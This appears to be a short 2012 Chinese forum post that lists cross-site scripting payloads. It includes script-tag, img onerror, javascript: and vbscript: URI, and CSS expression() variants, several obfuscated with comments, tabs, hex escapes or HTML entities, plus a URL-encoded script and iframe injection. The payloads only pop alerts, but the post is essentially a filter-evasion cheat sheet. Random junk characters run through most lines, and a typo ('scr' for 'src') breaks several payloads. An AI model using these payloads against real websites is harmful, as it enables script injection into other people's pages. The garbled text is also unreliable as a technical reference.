<script>alert("跨站")</script> (最常用), }0 Y0 L) \* L' E, ?* U5 B
<img scr=javascript:alert("跨站")></img>; c/ T4 f* j9 e
<img scr="javascript: alert(/跨站/)></img>; Q! e) L# _/ x& v
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
* A# j6 R* L/ H' s& U& g<img scr="#" onerror=alert(/跨站/)></img>
( Z+ h8 F% G6 |: P2 D* F<img scr="#" style="xss:expression(alert(/xss/));"></img>8 C4 ~3 [4 i% \0 l" T1 U! ?5 G# Z
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)5 m$ [( o+ s- }0 D) `% D# L
<img src=vbscript:msgbox ("xss")></img>9 T, S$ d! _ ~3 U
<style> input {left:expression (alert('xss'))}</style>
# N! ~3 Y7 O8 \: o<div style={left:expression (alert('xss'))}></div>
! V( z5 ?6 c; _; h* O: l<div style={left:exp/* */ression (alert('xss'))}></div>
7 J) u% `' c& w2 W* H) ]# Q1 P<div style={left:\0065\0078ression (alert('xss'))}></div>" F7 }0 t) E r; b
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>3 i& z# M7 v: q' l/ Y
unicode <div style="{left:expRessioN (alert('xss'))}">1 S' e& l( X7 [' h
. _# {$ H& Y1 J" F( ]8 U
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["6 j* A2 R. j! S8 W8 O
|
发表于 2012-9-15 14:09:13
收藏
支持
反对